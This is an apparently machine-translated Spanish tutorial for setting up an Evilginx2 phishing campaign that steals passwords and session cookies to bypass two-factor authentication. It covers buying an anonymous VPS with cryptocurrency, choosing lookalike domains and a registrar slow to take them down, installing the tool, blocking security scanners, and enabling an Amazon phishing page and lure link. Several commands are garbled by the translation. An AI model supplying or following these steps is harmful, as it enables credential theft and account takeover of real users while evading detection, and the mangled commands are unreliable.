
Que es Evilginx: Es una plataforma de ataque de tipo Adversary-in-the-Middle (AiTM) o intermediario. Actúa como un proxy inverso que se coloca entre la víctima y un sitio web legítimo (como Microsoft 365, Google o corporaciones) para capturar no solo contraseñas, sino también cookies de sesión válidas, lo que le permite eludir la autenticación de doble factor (MFA/2FA)
Paso 1: Obtener un servidor
El primer paso para cualquier campaña de phishing es adquirir un VPS relativamente barato para alojar su página. En mi opinión, el mejor lugar para esto es Panamaserver.com. Te permiten pagar con criptomonedas (aunque lamentablemente no con XMR), así que eso es bueno y los precios son realmente baratos. Para su sistema operativo, elija Debian, ya que funcionará mejor para esto.
Paso 2: Obtener un dominio de phishing
Para descubrir cuáles son algunos dominios de phishing, recomiendo instalar dnstwist en una máquina kali y ejecutar el dominio del sitio que estás usando en tu ataque a través de él para encontrar los dominios disponibles. Recomiendo usar namecheap para comprar su dominio, ya que tienen precios bastante económicos y no lo prohibirán rápidamente, lo cual siempre es genial.
Paso 3 (hora de escribir): Instalación de Evilginx2
Para instalar esto necesitamos ejecutar lo siguiente. Primero, asegúrese de que wget esté instalado.
actualización de sudo apt
sudo apt install wget -y
A continuación, necesitamos instalar Go.
wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
Ahora instalamos Go.
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C/usr/local/
A continuación, configuramos PATH
echo “exportar RUTA=/usr/local/go/bin:${RUTA}” | sudo tee/etc/profile.d/go.sh
fuente/etc/profile.d/go.sh
Ahora instalamos Evilginx. Prefiero este repositorio porque ya tiene phishlets y te ahorra algo de tiempo buscando y creando el tuyo propio.
sudo apt-get -y instalar git make
clon de git GitHub – BakkerJan/evilginx2: marco de ataque autónomo de intermediario utilizado para phishing de credenciales de inicio de sesión junto con cookies de sesión, lo que permite eludir la autenticación de 2 factores
cd malvadoginx2
hacer
Después de esto, instálelo globalmente.
sudo make install
Y ahora corre.
sudo evilginx

Paso 4 Crear página.
Al correr. Verás una lista de páginas que están todas deshabilitadas, elige la página que prefieras, pero primero debemos configurar Evilginx para que no tengamos problemas
dominio de configuración <yourdomain>
configuración ip <suIP>
lista negra unauth
El comando de lista negra sirve para bloquear su sitio de los escáneres. QUIERES HACER ESTO.
A continuación, elige el phishlet (página de phishing) que prefieras
phishlets nombre de host amazon <su nombre de dominio>
Los phishlets habilitan Amazon
Ahora es el momento de configurar nuestro señuelo para este sitio. Esta es la página de phishing en sí.
Los señuelos crean Amazon
lures edit 0 redirect_url
atrae get-url 0
Después de ejecutar lures get-url 0, debería ver aparecer un enlace en la pantalla, este es su enlace de phishing.
